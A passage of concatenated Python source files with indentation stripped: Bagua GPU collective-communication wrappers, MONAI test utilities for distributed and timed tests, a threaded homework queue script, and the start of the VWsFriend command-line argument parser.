with torch.cuda.stream(comm.cuda_stream):
comm.reduce_inplace(
tensor.to_bagua_tensor().bagua_backend_tensor(), dst, to_bagua_reduce_op(op)
)
torch.cuda.synchronize()
def allreduce_coalesced_inplace(
tensors,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
for tensor in tensors:
assert tensor.device != torch.device(
"cpu"
), "input tensors must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
coalesced = flatten(tensors)
comm.allreduce_inplace(
coalesced.to_bagua_tensor("allreduce_coalesced"), to_bagua_reduce_op(op)
)
for buf, synced in zip(tensors, unflatten(coalesced, tensors)):
buf.copy_(synced)
# TODO: remove
torch.cuda.synchronize()
def allreduce(
send_tensor,
recv_tensor,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""Reduces the tensor data across all machines in such a way that all get
the final result. After the call recv_tensor is going to be bitwise identical
in all processes.
Args:
send_tensor (torch.Tensor): Input of the collective.
recv_tensor (torch.Tensor): Output of the collective, must have the same size of send_tensor.
op (optional): one of the values from `torch.distributed.ReduceOp` enum. Specifies an operation used for element-wise reductions.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
Examples:
>>> from bagua.torch_api import allreduce
>>> # All tensors below are of torch.int64 type.
>>> # We have 2 process groups, 2 ranks.
>>> send_tensor = torch.arange(2, dtype=torch.int64) + 1 + 2 * rank
>>> recv_tensor = torch.zeros(2, dtype=torch.int64)
>>> send_tensor
tensor([1, 2]) # Rank 0
tensor([3, 4]) # Rank 1
>>> allreduce(send_tensor, recv_tensor)
>>> recv_tensor
tensor([4, 6]) # Rank 0
tensor([4, 6]) # Rank 1
>>> # All tensors below are of torch.cfloat type.
>>> # We have 2 process groups, 2 ranks.
>>> send_tensor = torch.tensor([1+1j, 2+2j], dtype=torch.cfloat) + 2 * rank * (1+1j)
>>> recv_tensor = torch.zeros(2, dtype=torch.cfloat)
>>> send_tensor
tensor([1.+1.j, 2.+2.j]) # Rank 0
tensor([3.+3.j, 4.+4.j]) # Rank 1
>>> allreduce(send_tensor, recv_tensor)
>>> recv_tensor
tensor([4.+4.j, 6.+6.j]) # Rank 0
tensor([4.+4.j, 6.+6.j]) # Rank 1
""" # noqa: E501
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.allreduce(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
to_bagua_reduce_op(op),
)
# TODO: remove
torch.cuda.synchronize()
def allreduce_inplace(
tensor,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of allreduce."""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.allreduce_inplace(
tensor.to_bagua_tensor().bagua_backend_tensor(), to_bagua_reduce_op(op)
)
torch.cuda.synchronize()
def allgather(
send_tensor,
recv_tensor,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""Gathers send_tensors from all machines to recv_tensor.
Args:
send_tensor (torch.Tensor): Input of the collective.
recv_tensor (torch.Tensor): Output of the collective, must have size send_tensor.size()*comm.nranks.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.allgather(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
)
torch.cuda.synchronize()
def allgather_inplace(
tensor,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of allgather."""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.allgather_inplace(tensor.to_bagua_tensor().bagua_backend_tensor())
torch.cuda.synchronize()
def gather(
send_tensor,
recv_tensor,
dst,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""Gathers send_tensors from all machines to recv_tensor in a single process.
Args:
send_tensor (torch.Tensor): Input of the collective.
recv_tensor (torch.Tensor): Output of the collective, must have size send_tensor.size()*comm.nranks.
dst (int): Destination rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.gather(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
dst,
)
torch.cuda.synchronize()
def gather_inplace(
tensor,
count,
dst,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of gather.
Args:
tensor (torch.Tensor): Input and output of the collective, For dst process,
has size count*comm.nranks() and acts as recv_tensor above. For non-dst processes,
has size count and acts as send_tensor above.
count (int): The per-rank data count.
dst (int): Destination rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.gather_inplace(tensor.to_bagua_tensor().bagua_backend_tensor(), count, dst)
torch.cuda.synchronize()
def scatter(
send_tensor,
recv_tensor,
src,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""Scatters send_tensor to all machines.
Args:
send_tensor (torch.Tensor): Input of the collective, must have size recv_tensor.size()*comm.nranks.
recv_tensor (torch.Tensor): Output of the collective.
src (int): Source rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.scatter(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
src,
)
torch.cuda.synchronize()
def scatter_inplace(
tensor,
count,
src,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of gather.
Args:
tensor (torch.Tensor): Input and output of the collective, For src process,
has size count*comm.nranks() and acts as send_tensor above. For non-src processes,
has size count and acts as recv_tensor above.
count (int): The per-rank data count.
src (int): Source rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.scatter_inplace(
tensor.to_bagua_tensor().bagua_backend_tensor(), count, src
)
torch.cuda.synchronize()
def reduce_scatter(
send_tensor,
recv_tensor,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""Reduces on send_tensor, then scatters send_tensor to all machines.
Args:
send_tensor (torch.Tensor): Input of the collective, must have size recv_tensor.size()*comm.nranks.
recv_tensor (torch.Tensor): Output of the collective.
op (optional): one of the values from `torch.distributed.ReduceOp` enum. Specifies an operation used for element-wise reductions.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.reduce_scatter(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
to_bagua_reduce_op(op),
)
torch.cuda.synchronize()
def reduce_scatter_inplace(
tensor,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of reduce_scatter.
Args:
send_tensor (torch.Tensor): Input and output of the collective, must satisfy: `tensor.size() % comm.nranks == 0`.
op (optional): one of the values from `torch.distributed.ReduceOp` enum. Specifies an operation used for element-wise reductions.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert tensor.device != torch.device("cpu"), "send tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.reduce_scatter_inplace(
tensor.to_bagua_tensor().bagua_backend_tensor(), to_bagua_reduce_op(op)
)
torch.cuda.synchronize()
def alltoall(
send_tensor,
recv_tensor,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""All processes send data to all processes.
Args:
send_tensor (torch.Tensor): Input of the collective, must satisfy: `send_tensor.size() % comm.nranks == 0`.
recv_tensor (torch.Tensor): Output of the collective, must have the same size of send_tensor.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.alltoall(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
)
torch.cuda.synchronize()
def alltoall_inplace(
tensor,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of alltoall."""
assert tensor.device != torch.device("cpu"), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.alltoall_inplace(tensor.to_bagua_tensor().bagua_backend_tensor())
torch.cuda.synchronize()
|
utils.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import functools
import importlib
import os
import queue
import sys
import tempfile
import time
import traceback
import unittest
import warnings
from io import BytesIO
from subprocess import PIPE, Popen
from typing import Optional
from urllib.error import ContentTooShortError, HTTPError, URLError
import numpy as np
import torch
import torch.distributed as dist
from monai.config.deviceconfig import USE_COMPILED
from monai.data import create_test_image_2d, create_test_image_3d
from monai.utils import ensure_tuple, optional_import, set_determinism
from monai.utils.module import get_torch_version_tuple
nib, _ = optional_import("nibabel")
ver, has_pkg_res = optional_import("pkg_resources", name="parse_version")
quick_test_var = "QUICKTEST"
def test_pretrained_networks(network, input_param, device):
try:
net = network(**input_param).to(device)
except (URLError, HTTPError, ContentTooShortError) as e:
raise unittest.SkipTest(e)
return net
def test_is_quick():
return os.environ.get(quick_test_var, "").lower() == "true"
def skip_if_quick(obj):
"""
Skip the unit tests if environment variable `quick_test_var=true`.
For example, the user can skip the relevant tests by setting ``export QUICKTEST=true``.
"""
is_quick = test_is_quick()
return unittest.skipIf(is_quick, "Skipping slow tests")(obj)
class SkipIfNoModule:
"""Decorator to be used if test should be skipped
when optional module is not present."""
def __init__(self, module_name):
self.module_name = module_name
self.module_missing = not optional_import(self.module_name)[1]
def __call__(self, obj):
return unittest.skipIf(self.module_missing, f"optional module not present: {self.module_name}")(obj)
class SkipIfModule:
"""Decorator to be used if test should be skipped
when optional module is present."""
def __init__(self, module_name):
self.module_name = module_name
self.module_avail = optional_import(self.module_name)[1]
def __call__(self, obj):
return unittest.skipIf(self.module_avail, f"Skipping because optional module present: {self.module_name}")(obj)
def skip_if_no_cpp_extension(obj):
"""
Skip the unit tests if the cpp extension is not available
"""
return unittest.skipUnless(USE_COMPILED, "Skipping cpp extension tests")(obj)
def skip_if_no_cuda(obj):
"""
Skip the unit tests if torch.cuda.is_available is False
"""
return unittest.skipUnless(torch.cuda.is_available(), "Skipping CUDA-based tests")(obj)
def skip_if_windows(obj):
"""
Skip the unit tests if platform is win32
"""
return unittest.skipIf(sys.platform == "win32", "Skipping tests on Windows")(obj)
class SkipIfBeforePyTorchVersion:
"""Decorator to be used if test should be skipped
with PyTorch versions older than that given."""
def __init__(self, pytorch_version_tuple):
self.min_version = pytorch_version_tuple
if has_pkg_res:
self.version_too_old = ver(torch.__version__) < ver(".".join(map(str, self.min_version)))
else:
self.version_too_old = get_torch_version_tuple() < self.min_version
def __call__(self, obj):
return unittest.skipIf(
self.version_too_old, f"Skipping tests that fail on PyTorch versions before: {self.min_version}"
)(obj)
class SkipIfAtLeastPyTorchVersion:
"""Decorator to be used if test should be skipped
with PyTorch versions newer than that given."""
def __init__(self, pytorch_version_tuple):
self.max_version = pytorch_version_tuple
if has_pkg_res:
self.version_too_new = ver(torch.__version__) >= ver(".".join(map(str, self.max_version)))
else:
self.version_too_new = get_torch_version_tuple() >= self.max_version
def __call__(self, obj):
return unittest.skipIf(
self.version_too_new, f"Skipping tests that fail on PyTorch versions at least: {self.max_version}"
)(obj)
def make_nifti_image(array, affine=None):
"""
Create a temporary nifti image on the disk and return the image name.
User is responsible for deleting the temporary file when done with it.
"""
if affine is None:
affine = np.eye(4)
test_image = nib.Nifti1Image(array, affine)
temp_f, image_name = tempfile.mkstemp(suffix=".nii.gz")
nib.save(test_image, image_name)
os.close(temp_f)
return image_name
def make_rand_affine(ndim: int = 3, random_state: Optional[np.random.RandomState] = None):
"""Create random affine transformation (with values == -1, 0 or 1)."""
rs = np.random if random_state is None else random_state
vals = rs.choice([-1, 1], size=ndim)
positions = rs.choice(range(ndim), size=ndim, replace=False)
af = np.zeros([ndim + 1, ndim + 1])
af[ndim, ndim] = 1
for i, (v, p) in enumerate(zip(vals, positions)):
af[i, p] = v
return af
class DistTestCase(unittest.TestCase):
"""
testcase without _outcome, so that it's picklable.
"""
def __getstate__(self):
self_dict = self.__dict__.copy()
del self_dict["_outcome"]
return self_dict
def __setstate__(self, data_dict):
self.__dict__.update(data_dict)
class DistCall:
"""
Wrap a test case so that it will run in multiple processes on a single machine using `torch.distributed`.
It is designed to be used with `tests.utils.DistTestCase`.
Usage:
decorate a unittest testcase method with a `DistCall` instance::
class MyTests(unittest.TestCase):
@DistCall(nnodes=1, nproc_per_node=3, master_addr="localhost")
def test_compute(self):
...
the `test_compute` method should trigger different worker logic according to `dist.get_rank()`.
Multi-node tests require a fixed master_addr:master_port, with node_rank set manually in multiple scripts
or from environment variable "NODE_RANK".
"""
def __init__(
self,
nnodes: int = 1,
nproc_per_node: int = 1,
master_addr: str = "localhost",
master_port: Optional[int] = None,
node_rank: Optional[int] = None,
timeout=60,
init_method=None,
backend: Optional[str] = None,
daemon: Optional[bool] = None,
method: Optional[str] = "spawn",
verbose: bool = False,
):
"""
Args:
nnodes: The number of nodes to use for distributed call.
nproc_per_node: The number of processes to call on each node.
master_addr: Master node (rank 0)'s address, should be either the IP address or the hostname of node 0.
master_port: Master node (rank 0)'s free port.
node_rank: The rank of the node, this could be set via environment variable "NODE_RANK".
timeout: Timeout for operations executed against the process group.
init_method: URL specifying how to initialize the process group.
Default is "env://" or "file:///d:/a_temp" (windows) if unspecified.
backend: The backend to use. Depending on build-time configurations,
valid values include ``mpi``, ``gloo``, and ``nccl``.
daemon: the process’s daemon flag.
When daemon=None, the initial value is inherited from the creating process.
method: set the method which should be used to start a child process.
method can be 'fork', 'spawn' or 'forkserver'.
verbose: whether to print NCCL debug info.
"""
self.nnodes = int(nnodes)
self.nproc_per_node = int(nproc_per_node)
if self.nnodes < 1 or self.nproc_per_node < 1:
raise ValueError(
f"number of nodes and processes per node must be >= 1, got {self.nnodes} and {self.nproc_per_node}"
)
self.node_rank = int(os.environ.get("NODE_RANK", "0")) if node_rank is None else int(node_rank)
self.master_addr = master_addr
self.master_port = np.random.randint(10000, 20000) if master_port is None else master_port
if backend is None:
self.backend = "nccl" if torch.distributed.is_nccl_available() and torch.cuda.is_available() else "gloo"
else:
self.backend = backend
self.init_method = init_method
if self.init_method is None and sys.platform == "win32":
self.init_method = "file:///d:/a_temp"
self.timeout = datetime.timedelta(0, timeout)
self.daemon = daemon
self.method = method
self._original_method = torch.multiprocessing.get_start_method(allow_none=False)
self.verbose = verbose
def run_process(self, func, local_rank, args, kwargs, results):
_env = os.environ.copy() # keep the original system env
try:
os.environ["MASTER_ADDR"] = self.master_addr
os.environ["MASTER_PORT"] = str(self.master_port)
os.environ["LOCAL_RANK"] = str(local_rank)
if self.verbose:
os.environ["NCCL_DEBUG"] = "INFO"
os.environ["NCCL_DEBUG_SUBSYS"] = "ALL"
os.environ["NCCL_BLOCKING_WAIT"] = str(1)
os.environ["OMP_NUM_THREADS"] = str(1)
os.environ["WORLD_SIZE"] = str(self.nproc_per_node * self.nnodes)
os.environ["RANK"] = str(self.nproc_per_node * self.node_rank + local_rank)
if torch.cuda.is_available():
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
torch.cuda.set_device(int(local_rank))
dist.init_process_group(
backend=self.backend,
init_method=self.init_method,
timeout=self.timeout,
world_size=int(os.environ["WORLD_SIZE"]),
rank=int(os.environ["RANK"]),
)
func(*args, **kwargs)
# the primary node lives longer to
# avoid _store_based_barrier, RuntimeError: Broken pipe
# as the TCP store daemon is on the rank 0
if int(os.environ["RANK"]) == 0:
time.sleep(0.1)
results.put(True)
except Exception as e:
results.put(False)
raise e
finally:
os.environ.clear()
os.environ.update(_env)
try:
dist.destroy_process_group()
except RuntimeError as e:
warnings.warn(f"While closing process group: {e}.")
def __call__(self, obj):
if not torch.distributed.is_available():
return unittest.skipIf(True, "Skipping distributed tests because not torch.distributed.is_available()")(obj)
if torch.cuda.is_available() and torch.cuda.device_count() < self.nproc_per_node:
return unittest.skipIf(
True,
f"Skipping distributed tests because it requires {self.nnodes} devices "
f"but got {torch.cuda.device_count()}",
)(obj)
_cache_original_func(obj)
@functools.wraps(obj)
def _wrapper(*args, **kwargs):
if self.method:
try:
torch.multiprocessing.set_start_method(self.method, force=True)
except (RuntimeError, ValueError):
pass
processes = []
results = torch.multiprocessing.Queue()
func = _call_original_func
args = [obj.__name__, obj.__module__] + list(args)
for proc_rank in range(self.nproc_per_node):
p = torch.multiprocessing.Process(
target=self.run_process, args=(func, proc_rank, args, kwargs, results)
)
if self.daemon is not None:
p.daemon = self.daemon
p.start()
processes.append(p)
for p in processes:
p.join()
if self.method:
try:
torch.multiprocessing.set_start_method(self._original_method, force=True)
except (RuntimeError, ValueError):
pass
assert results.get(), "Distributed call failed."
return _wrapper
class TimedCall:
"""
Wrap a test case so that it will run in a new process, raises a TimeoutError if the decorated method takes
more than `seconds` to finish. It is designed to be used with `tests.utils.DistTestCase`.
"""
def __init__(
self,
seconds: float = 60.0,
daemon: Optional[bool] = None,
method: Optional[str] = "spawn",
force_quit: bool = True,
skip_timing=False,
):
"""
Args:
seconds: timeout seconds.
daemon: the process’s daemon flag.
When daemon=None, the initial value is inherited from the creating process.
method: set the method which should be used to start a child process.
method can be 'fork', 'spawn' or 'forkserver'.
force_quit: whether to terminate the child process when `seconds` elapsed.
skip_timing: whether to skip the timing constraint.
this is useful to include some system conditions such as
`torch.cuda.is_available()`.
"""
self.timeout_seconds = seconds
self.daemon = daemon
self.force_quit = force_quit
self.skip_timing = skip_timing
self.method = method
self._original_method = torch.multiprocessing.get_start_method(allow_none=False) # remember the default method
@staticmethod
def run_process(func, args, kwargs, results):
try:
output = func(*args, **kwargs)
results.put(output)
except Exception as e:
e.traceback = traceback.format_exc()
results.put(e)
def __call__(self, obj):
if self.skip_timing:
return obj
_cache_original_func(obj)
@functools.wraps(obj)
def _wrapper(*args, **kwargs):
if self.method:
try:
torch.multiprocessing.set_start_method(self.method, force=True)
except (RuntimeError, ValueError):
pass
func = _call_original_func
args = [obj.__name__, obj.__module__] + list(args)
results = torch.multiprocessing.Queue()
p = torch.multiprocessing.Process(target=TimedCall.run_process, args=(func, args, kwargs, results))
if self.daemon is not None:
p.daemon = self.daemon
p.start()
p.join(timeout=self.timeout_seconds)
timeout_error = None
try:
if p.is_alive():
# create an Exception
timeout_error = torch.multiprocessing.TimeoutError(
f"'{obj.__name__}' in '{obj.__module__}' did not finish in {self.timeout_seconds}s."
)
if self.force_quit:
p.terminate()
else:
warnings.warn(
f"TimedCall: deadline ({self.timeout_seconds}s) "
f"reached but waiting for {obj.__name__} to finish."
)
finally:
p.join()
res = None
try:
res = results.get(block=False)
except queue.Empty: # no result returned, took too long
pass
finally:
if self.method:
try:
torch.multiprocessing.set_start_method(self._original_method, force=True)
except (RuntimeError, ValueError):
pass
if isinstance(res, Exception): # other errors from obj
if hasattr(res, "traceback"):
raise RuntimeError(res.traceback) from res
raise res
if timeout_error: # no force_quit finished
raise timeout_error
return res
return _wrapper
_original_funcs = {}
def _cache_original_func(obj) -> None:
"""cache the original function by name, so that the decorator doesn't shadow it."""
global _original_funcs
_original_funcs[obj.__name__] = obj
def _call_original_func(name, module, *args, **kwargs):
if name not in _original_funcs:
_original_module = importlib.import_module(module) # reimport, refresh _original_funcs
if not hasattr(_original_module, name):
# refresh module doesn't work
raise RuntimeError(f"Could not recover the original {name} from {module}: {_original_funcs}.")
f = _original_funcs[name]
return f(*args, **kwargs)
class NumpyImageTestCase2D(unittest.TestCase):
im_shape = (128, 64)
input_channels = 1
output_channels = 4
num_classes = 3
def setUp(self):
im, msk = create_test_image_2d(self.im_shape[0], self.im_shape[1], 4, 20, 0, self.num_classes)
self.imt = im[None, None]
self.seg1 = (msk[None, None] > 0).astype(np.float32)
self.segn = msk[None, None]
class TorchImageTestCase2D(NumpyImageTestCase2D):
def setUp(self):
NumpyImageTestCase2D.setUp(self)
self.imt = torch.tensor(self.imt)
self.seg1 = torch.tensor(self.seg1)
self.segn = torch.tensor(self.segn)
class NumpyImageTestCase3D(unittest.TestCase):
im_shape = (64, 48, 80)
input_channels = 1
output_channels = 4
num_classes = 3
def setUp(self):
im, msk = create_test_image_3d(self.im_shape[0], self.im_shape[1], self.im_shape[2], 4, 20, 0, self.num_classes)
self.imt = im[None, None]
self.seg1 = (msk[None, None] > 0).astype(np.float32)
self.segn = msk[None, None]
class TorchImageTestCase3D(NumpyImageTestCase3D):
def setUp(self):
NumpyImageTestCase3D.setUp(self)
self.imt = torch.tensor(self.imt)
self.seg1 = torch.tensor(self.seg1)
self.segn = torch.tensor(self.segn)
def test_script_save(net, *inputs, eval_nets=True, device=None, rtol=1e-4):
"""
Test the ability to save `net` as a Torchscript object, reload it, and apply inference. The value `inputs` is
forward-passed through the original and loaded copy of the network and their results returned. Both `net` and its
reloaded copy are set to evaluation mode if `eval_nets` is True. The forward pass for both is done without
gradient accumulation.
The test will be performed with CUDA if available, else CPU.
"""
if True:
device = "cpu"
else:
# TODO: It would be nice to be able to use GPU if
# available, but this currently causes CI failures.
if not device:
device = "cuda" if torch.cuda.is_available() else "cpu"
# Convert to device
inputs = [i.to(device) for i in inputs]
scripted = torch.jit.script(net.cpu())
buffer = scripted.save_to_buffer()
reloaded_net = torch.jit.load(BytesIO(buffer)).to(device)
net.to(device)
if eval_nets:
net.eval()
reloaded_net.eval()
with torch.no_grad():
set_determinism(seed=0)
result1 = net(*inputs)
result2 = reloaded_net(*inputs)
set_determinism(seed=None)
# convert results to tuples if needed to allow iterating over pairs of outputs
result1 = ensure_tuple(result1)
result2 = ensure_tuple(result2)
for i, (r1, r2) in enumerate(zip(result1, result2)):
if None not in (r1, r2): # might be None
np.testing.assert_allclose(
r1.detach().cpu().numpy(),
r2.detach().cpu().numpy(),
rtol=rtol,
atol=0,
err_msg=f"failed on comparison number: {i}",
)
def query_memory(n=2):
"""
Find best n idle devices and return a string of device ids.
"""
bash_string = "nvidia-smi --query-gpu=utilization.gpu,power.draw,memory.used --format=csv,noheader,nounits"
try:
p1 = Popen(bash_string.split(), stdout=PIPE)
output, error = p1.communicate()
free_memory = [x.split(",") for x in output.decode("utf-8").split("\n")[:-1]]
free_memory = np.asarray(free_memory, dtype=float).T
ids = np.lexsort(free_memory)[:n]
except (FileNotFoundError, TypeError, IndexError):
ids = range(n) if isinstance(n, int) else []
return ",".join([f"{int(x)}" for x in ids])
if __name__ == "__main__":
print(query_memory())
|
queue_sys.py
|
#!/usr/bin/env python3
# ===================================================================================
# Copyright @2020 Yanyu Zhang zhangya@bu.edu
# HW4 : Build queue system
# ===================================================================================
import queue
from tweepy_get import tweepy_get
from image2video import image_to_video
import multiprocessing
import time
import threading
def queue_1(keyNames, number_thread):
def worker():
i = 0
while True:
item = q.get()
if item is None:
print("Break ! Because item is None")
break
tweepy_get(item)
image_to_video(item)
i += 1
print("---------------Thread Done--------------")
q.task_done()
q = queue.Queue()
threads = []
for i in range(number_thread):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
for item in keyNames:
q.put(item)
q.join()
for i in range(number_thread):
q.put(None)
for t in threads:
t.join()
|
vwsfriend.py
|
import os
import sys
import re
import argparse
from datetime import datetime, timedelta, timezone
import logging
import time
import tempfile
import netrc
import getpass
import threading
from pyhap.accessory_driver import AccessoryDriver
from weconnect import weconnect
from weconnect.__version import __version__ as __weconnect_version__
from vwsfriend.ui.vwsfriend_ui import VWsFriendUI
from vwsfriend.homekit.bridge import VWsFriendBridge
from vwsfriend.agent_connector import AgentConnector
from vwsfriend.homekit.custom_characteristics import CUSTOM_CHARACTERISTICS
from .__version import __version__
LOG_LEVELS = ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]
DEFAULT_LOG_LEVEL = "ERROR"
LOG = logging.getLogger("VWsFriend")
class NumberRangeArgument:
def __init__(self, imin=None, imax=None):
self.imin = imin
self.imax = imax
def __call__(self, arg):
try:
value = int(arg)
except ValueError as e:
raise self.exception() from e
if (self.imin is not None and value < self.imin) or (self.imax is not None and value > self.imax):
raise self.exception()
return value
def exception(self):
if self.imin is not None and self.imax is not None:
return argparse.ArgumentTypeError(f'Must be a number from {self.imin} to {self.imax}')
if self.imin is not None:
return argparse.ArgumentTypeError(f'Must be a number not smaller than {self.imin}')
if self.imax is not None:
return argparse.ArgumentTypeError(f'Must be number not larger than {self.imax}')
return argparse.ArgumentTypeError('Must be a number')
def main(): # noqa: C901 pylint: disable=too-many-branches, too-many-statements, too-many-locals
parser = argparse.ArgumentParser(
prog='vwsfriend',
description='TBD')
parser.add_argument('--version', action='version',
version='%(prog)s {version} (using WeConnect-python {weversion})'.format(version=__version__, weversion=__weconnect_version__))
weConnectGroup = parser.add_argument_group('WeConnect')
weConnectGroup.add_argument('-u', '--username', help='Username of Volkswagen id', required=False)
weConnectGroup.add_argument('-p', '--password', help='Password of Volkswagen id', required=False)
defaultNetRc = os.path.join(os.path.expanduser("~"), ".netrc")
weConnectGroup.add_argument('--netrc', help=f'File in netrc syntax providing login (default: {defaultNetRc}).'
' Netrc is only used when username and password are not provided as arguments',
default=None, required=False)
weConnectGroup.add_argument('-i', '--interval', help='Query interval in seconds',
type=NumberRangeArgument(imin=300), required=False, default=300)
defaultTemp = os.path.join(tempfile.gettempdir(), 'weconnect.token')
weConnectGroup.add_argument('--tokenfile', help=f'file to store token (default: {defaultTemp})', default=defaultTemp)
weConnectGroup.add_argument('--no-token-storage', dest='noTokenStorage', help='Do not store token on filesystem (this'
' will cause a new login for every invokation!)', action='store_true')
parser.add_argument('-v', '--verbose', action="append_const", const=-1,)
parser.add_argument('--config-dir', dest='configDir', help='directory to store configuration files (default: ./)', default='./')
parser.add_argument('--demo', help='folder containing demo scenario, see README for more information')
dbGroup = parser.add_argument_group('Database & visualization')
dbGroup.add_argument('--with-database', dest='withDatabase', help='Connect VWsFriend to database for visualization', action='store_true')
dbGroup.add_argument('--database-url', dest='dbUrl', help='Database to connect to', default='sqlite:///vwsfrienddevel.db')
abrpGroup = parser.add_argument_group('ABRP: A better route planner')
abrpGroup.add_argument('--with-abrp', dest='withABRP', help='Connect VWsFriend to ABRP (you need to add userTokens in the UI!)', action='store_true')
